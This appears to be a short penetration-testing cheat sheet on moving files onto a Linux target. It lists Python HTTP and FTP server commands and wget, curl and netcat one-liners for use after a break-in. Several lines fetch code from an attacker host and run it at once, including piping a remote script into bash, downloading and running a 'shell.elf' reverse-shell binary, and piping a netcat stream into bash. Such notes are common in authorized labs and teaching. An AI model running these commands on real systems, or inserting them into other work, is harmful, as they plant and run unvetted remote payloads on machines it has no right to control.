Linux

Python (HTTP Server)

python -m SimpleHTTPServer 80
python3 -m http.server

Python (FTP Server)

Python -m pyftpdlib -p 21 --write

Wget

wget http://10.10.10.10/linenum.sh
wget -O - 10.10.10.10/linenum.sh | bash
wget -P /tmp http://kali/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf

Curl

curl http://10.10.10.10/linenum.sh -o linenum.sh
curl Kali_IP/file -o /tmp/file && chmod +x /tmp/file && /tmp/file

Netcat

nc -lvp 5555 < linenum.sh
nc 10.10.10.10 5555 | bash

TFTP

SCP

axel

Last updated